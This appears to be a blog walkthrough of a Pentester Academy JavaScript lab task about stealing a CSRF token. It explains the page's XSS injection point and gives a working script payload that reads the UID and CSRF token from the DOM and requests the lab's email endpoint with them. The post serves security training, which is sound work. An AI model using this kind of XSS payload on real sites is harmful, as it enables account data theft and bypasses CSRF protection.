Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is same as of task 16. In this task, we learn how to use, find and play with CSRF tokens.CSRF tokens are used to mitigate Cross-site request forgery, but these tokens would be bypass if not used properly. You can view solutions to the other tasks here.

Task 17: CSRF Token Stealing | TASK LINK

The task is to find Email Address of UID=986 using an XSS vulnerability on that page with CSRF token value=8675699351612121977981321312312123123126554427773. The value of the token is random and you can not predict the flow and entropy. This task is also of moderate level, you have to have the knowledge of XMLHttpRequest method. You should know what is the syntax and how to use it.
Solution:
The injection point is the same as in the previous task is the url parameter, You can apply some injections to verify that too. While viewing the source code you will see this comment “ Email can be obtained via a GET request to /lab/webapp/jfp/17/email with params uid=XXX where XXX is the user id you will have to find dynamically using the XSS and anything else you might need? csrf_token ?:) ” in the source code, that may have been written by the developer. So in this task, we have to dynamically find the UID and CSRF token value.

<script>
var uid = document.getElementById('uid').innerHTML;
var uidarr = uid.split(":");
var token = document.getElementById('csrf').innerHTML;
var tokenarr = token.split(":");
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if (this.status == 200 && this.readyState == 4)
{
var data = this.responseText;
document.getElementById('result').innerHTML = data;
}
};
req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/17/email?uid='+uidarr[1]+'&csrf_token='+tokenarr[1],true);
req.send();
</script>

The developer makes our task more simple by providing appropriate id’s to the UID and CSRF token value, So we have to just grab those values and put those values into our XML request, after that we will create an XML request to the commented link and retrieve the response in text format and put that into the div field with id=”result”. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page.
Refer this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided at Pentester Academy website.